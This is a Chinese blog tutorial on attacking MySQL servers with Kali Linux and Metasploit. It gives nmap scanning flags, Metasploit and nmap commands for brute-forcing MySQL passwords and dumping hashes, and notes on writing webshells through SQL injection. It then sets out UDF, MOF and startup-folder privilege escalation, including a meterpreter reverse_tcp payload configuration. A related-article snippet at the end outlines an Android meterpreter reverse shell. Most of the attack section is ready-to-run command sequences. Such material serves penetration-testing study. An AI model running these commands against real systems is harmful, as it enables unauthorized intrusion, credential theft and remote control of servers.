【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程

最新推荐文章于 2024-02-26 10:29:26 发布
最新推荐文章于 2024-02-26 10:29:26 发布
阅读量2.3k 收藏 9
点赞数 1
分类专栏: 0X03【kali渗透】 文章标签: 安全 linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/126189385
版权

目录

一、渗透攻击MySQL

1.1、第一步:信息收集

db_nmap扫描(内置、外置都可)

Metasploit模块

sqlmap

1.2、第二步:获取服务器权限(爆破)

MySQL 口令爆破

哈希值爆破

泄露的源码中寻找数据库密码

向服务器写WebShell

1.3、第三步:提权

UDF提权(UDF提权)

Mof提权

MySQL启动项提权

1.4、第四步:MySQL 0day 漏洞

一、渗透攻击MySQL

1.1、第一步:信息收集

db_nmap扫描(内置、外置都可)

目标发现


-iL        #添加扫描ip列表文件
-iR        #随机选择目标
           #不用指定目标ip,nmap对全球的ip随机选择100个进行扫描
--exclude  #排除扫描

主机发现


-sn     #ping扫描,不扫描端口
-Pn     #完全扫描(穿透防火墙)
-PS/PA/PU/PY[portlist]   #协议扫描,TCP、SYN/ACK、UDP、SCTP ,基于上述协议扫描端口
-PO[protocol list]       #使用ip协议扫描
-n/-R
-n:   #不进行nds解析
-R:   #对其进行反向解析
--dns-servers    #更换DNS服务器为得到不同的扫描结果
--traceroute     #路由追踪,等同于traceroute命令

端口发现

-sS/sT/sA/sW/sM   #基于TCP的端口发现(SYN全连接 ACK窗口 Maimon扫描)
-sU         #基于UPD协议的扫描,但是UDP的扫描的准确率并不高
-sN/sF/sX   #基于TCP的空/finish/xmas的扫描
--scanflags <flags>  #对TCP的扫描,是对tcpflags位的组合,可以自定义组合
-sI         #僵尸扫描
-sY/sZ      #基于SCTP协议(少用)
-b          #基于FTP的中继扫描


端口和扫描菜单

-p     #扫描特定类型端口/范围
--exclude-ports  #排除不需扫描的端口范围
-F     #快速扫描
-r     #按顺序扫描
namp默认每次扫描中随机选择(常用端口的top n),-r会使namp按照从大到小的顺序进行



服务/版本探测

-sV
--version-intensity
--version-trace
对扫描过程进行跟踪,显示扫描的具体过程

Metasploit模块

 #获取MySQL相关信息
auxiliary/admin/mysql/mysql_enum
auxiliary/scanner/mysql/mysql_version

 #文件枚举和目录可写信息枚举
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_writable_dirs

sqlmap

通过注入点利用,获取数据库相关信息

1.2、第二步:获取服务器权限(爆破)

如果目标服务器开启3389端口,并且允许远程访问,可以采取爆破MySQL用户密码,获取MySQL的权限

MySQL 口令爆破

爆破成功的几率很低几乎为零,除非管理员用的是弱口令。通过社工可以提高一定成功率,通过收集各种信息,例如姓名、社交平台账号/昵称、手机号、生日、伴侣姓名/生日、职业等信息,通过信息生成针对性的字典,利用该字典进行爆破

1、metasploit相关模块爆破

use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.x.x
set pass_file /tmp/wordlists.txt    # 设置字典
set username root
run

2、nmap扫描并破解

nmap --script=mysql-brute.nse <ip> -p 3306

自定义账号、密码
nmap  --script=mysql-brute.nse userdb=/tmp/passdb.txt passdb=/tmp/pass.txt 192.168.1.13 -p 3306

检查mysql root空口令
nmap --script=mysql-empty-password.nse <ip>

哈希值爆破

auxiliary/scanner/mysql/mysql_hashdump

导出在当前登陆用户权限下可以查看账户的密码hash

泄露的源码中寻找数据库密码

网站的配置文件中大多含有数据库的连接配置,如数据库用户名、密码等配置信息

eg:config  connect等

向服务器写WebShell

前提:存在sql注入漏洞、当前用户具有写入权限、目标网站Web物理路径、secure_file_priv 选项支持数据导出

高版本的MYSQL添加了secure_file_priv,对导出文件做了限制:

1、输出目录路径应该secure_file_priv值一致,才能导出。

2、若其值为空,则无限制。

3、值为 NULL 时,表示不允许导入或导出

1.3、第三步:提权

UDF提权(UDF提权)

use exploit/multi/mysql/mysql_udf_payload
set rhosts 192.168.x.x
set username root
set password root
run

MSF会将一个随机命名的UDF文件写入lib/plugin目录下(该目录不存在,则无法成功),该UDF文件中包含sys_exec()和sys_eval()这两个函数,但是默认只创建sys_exec()函数,该函数执行不会有回显。
可以手动引入 sys_eval() 函数,来执行有回显的命令
create function sys_eval returns string soname 'guuHCUiK.dll';

Mof提权

exploit/windows/mysql/mysql_mof

MySQL启动项提权

use exploit/windows/mysql/mysql_start_up
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.x.x
set lport 4444
set rhosts x.x.x.x
set username root
set password root
set startup_folder xxx     # 根据目标系统进行设置自启目录
run

1.4、第四步:MySQL 0day 漏洞

网上查询了去利用

黑色地带(崛起)
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Metasploit 数据库渗透测试实战
悦分享
12-15 1043
当Web服务器中有大量的信息需要频繁更新的时候,就使用到数据库技术了。实际上数据库技术的历史要比Web还要久远,早在20世纪60年代数据库就作为计算机科学的一个重要分支兴起,它取代了之前的文件系统存储。作为Web服务器的核心组成部分,数据库往往保存了大量的重要信息,如何保证这些信息的安全性也成为十分重要的研究重点。如果你关注网络安全方面的新闻,应该会经常听到“拖库”“撞库”和“洗库”这些词语,它们其实都是针对数据库的攻击行为。
Kali-Linux-高级渗透测试-Robert-W.-Beggs.epub
07-15
高级渗透测试
kali linux对Metasploitable2漏洞利用mysql爆力破解 笔记
边城浪子的博客
09-19 1176
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS (Relational Database Management System,关系数据库管理系统) 应用软件。 MySQL是一种关系数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所...
Kali系统MSF模块暴力破解MySQL弱口令漏洞
最新发布
dzqxwzoe的博客
02-26 917
攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞利用的脚本,并且使用起来很简单的网络安全工具。这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求被攻击的服务器开启了3306端口号。
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:https://download.csdn.net/download/weixin_43800734/88423342 文件3:https://download.csdn.net/download/weixin_43800734/88423341 文件4:https://download.csdn.net/download/weixin_43800734/88423331
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
Kali-linux渗透攻击应用
2301_77162959的博客
05-17 2249
前面依次介绍了Armitage、MSFCONSOLE和MSFCLI接口的概念及使用。本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等。
第七章、Metasploit渗透测试框架的基本使用
m0_73780812的博客
05-18 339
4、模块相关命令show(show命令的有效参数是:all,encoders,nops,exploits,payloads,auxiliary,post,plugins,info,options)2、使用name关键字查询(只有Name中有的)模块。mysql路径下所有的可利用mysql模块。5、search命令寻找相关模块。9、查看可以攻击哪些操作系统。7、模块相关命令use使用。11、查看设置了那些值。3、怎么筛选漏洞模块。装载一个渗透攻击模块。10、查看攻击目标主机。4、通过路径查找模块。
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 1697
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDF、UDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
Kali之渗透攻击
m0_64091527的博客
05-31 1861
kali渗透攻击
kali-linux 工具Metasploit离线式攻击使用教程
12-29
攻击实例讲解4-Metasploit离线式攻击.rar
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
安装kali-2021版本渗透测试系统-课程资料.rar
06-09
安装kali-2021版本渗透测试系统-课程资料 含kali镜像BT种子
kali使用mysql注入攻击_基于kali实现的一些攻击
weixin_39653320的博客
01-25 1690
本文如果出现什么错误,或者有什么建议欢迎随时联系我,谢谢!1、局域网断网攻击-----ARP攻击(使用kali下的arpspoof工具,为了方便,受害主机为本人主机)(1)Windows下查询本机IP地址、默认网关:Cmd下ipconfig(2)查找局域网中的IP地址:fping -asg 10.22.116.0/241(3)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关模...
Kali--渗透攻击Mysql数据库服务
热门推荐
齐泽文的Blog
04-12 1万+
Mysql是个关系型数据库管理系统,由瑞典Mysql AB开发,目前属于Oracle公司,在Metasploitable系统中,Mysql的身份认证存在漏洞,这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库。本教程将介绍使用MetasploitMysql扫描模块渗透攻击Mysql数据库服务。(1)启动MSFCONSOLE。root@kali:~#msfconsole(2)扫描所...
kali mysql停止服务器_从零开始:手把手教你黑客入门攻破服务器并获取ROOT权限...
weixin_39595621的博客
10-21 374
有许多人对神秘的黑客一直感兴趣,却苦于网上资料繁杂,无法入门,在学黑客之前,你要知道什么是黑客,黑客就是那些对计算机有着强烈探索欲的人,一个真正的黑客,必须要至少掌握一门编程技术和熟悉系统的操作命令。 下面我会实际演示一个黑客是如何通过一个普通的网站攻破服务器并获取ROOT权限。 基础环境准备 1、安装Vmware虚拟机(不建议使用真机); 2、前往vulnhub下载测试镜像,下载地址 http...
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 4271
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
使用kali 中的msf对自己的手机进行渗透的完整指令
06-11
在使用 Metasploit 渗透测试工具进行攻击前,需要明确一点:您必须拥有目标手机的授权。否则,您的行为将违反法律法规,承担法律责任。 以下是在 Kali 中使用 Metasploit 渗透测试工具对 Android 手机进行攻击的一般步骤: 1. 打开终端,输入 `msfconsole` 命令启动 Metasploit 控制台。 2. 在 Metasploit 控制台中,输入 `use exploit/multi/handler` 命令,选择要使用的 exploit 模块。 3. 设置监听器参数,包括 `LHOST`(监听主机的 IP 地址)和 `LPORT`(监听的端口号)。例如,输入 `set LHOST 192.168.0.100` 和 `set LPORT 4444` 命令设置监听器。 4. 输入 `exploit` 命令启动监听器,并等待目标手机连接。 5. 在目标手机上安装 Metasploit 的反向 shell 客户端。可以使用 Metasploit 中的 `android/meterpreter/reverse_tcp` 模块生成反向 shell 客户端,或者使用其他工具生成。将反向 shell 客户端安装在目标手机上。 6. 反向 shell 客户端连接到监听器后,您就可以在 Metasploit 控制台中执行一些命令,例如 `meterpreter > sysinfo` 命令查看目标手机的系统信息,或者 `meterpreter > shell` 命令在目标手机上打开一个 shell 终端。 请注意,这只是一般的步骤,实际操作中可能会因为目标手机的不同而有所不同。而且,再次强调,您必须拥有目标手机的授权才能进行渗透测试,否则将涉嫌违法行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值